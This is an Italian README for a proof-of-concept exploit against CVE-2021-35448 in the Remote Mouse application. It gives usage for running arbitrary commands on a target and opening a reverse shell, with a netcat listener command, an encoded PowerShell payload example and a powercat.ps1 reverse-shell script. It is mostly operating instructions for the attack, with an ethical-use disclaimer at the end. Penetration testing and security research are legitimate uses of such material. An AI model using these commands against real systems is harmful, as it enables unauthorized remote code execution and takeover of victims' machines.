
POC per CVE-2021-35448 basato su https://www.exploit-db.com/exploits/49601
Questo exploit prende di mira la vulnerabilità CVE-2021-35448 nell'applicazione Remote Mouse (precedentemente nota come WiFi Mouse).
python3 CVE-2021-35448.py -t <TARGET_IP> [OPTIONS]
-t, --target: Indirizzo IP del target (obbligatorio)-p, --payload: Comando personalizzato da eseguire-r, --reverse: Reverse shell in formato IP:PORT-l, --http: Server HTTP locale in formato IP:PORT (obbligatorio con -r)python3 CVE-2021-35448.py -t 192.168.1.100 -p "Powershell -e JAB...=="
# Terminale 1 - Listener
nc -nlvp 4444
# Terminale 2 - Exploit
python3 CVE-2021-35448.py -t $REMOTESERVER_IP -r $REVSHELL_IP:$PORT -l 0.0.0.0:$PORT
CVE-2021-35448.py: Script di exploit principalepowercat.ps1: Script PowerShell per reverse shell⚠️ SOLO USO ETICO ⚠️
Questo strumento è destinato esclusivamente a scopi educativi e a test di penetrazione autorizzati. L'uso non autorizzato di questo exploit è illegale e può comportare azioni legali.
Sviluppato per scopi educativi e di test di penetrazione etici.
Ultimo aggiornamento: 2025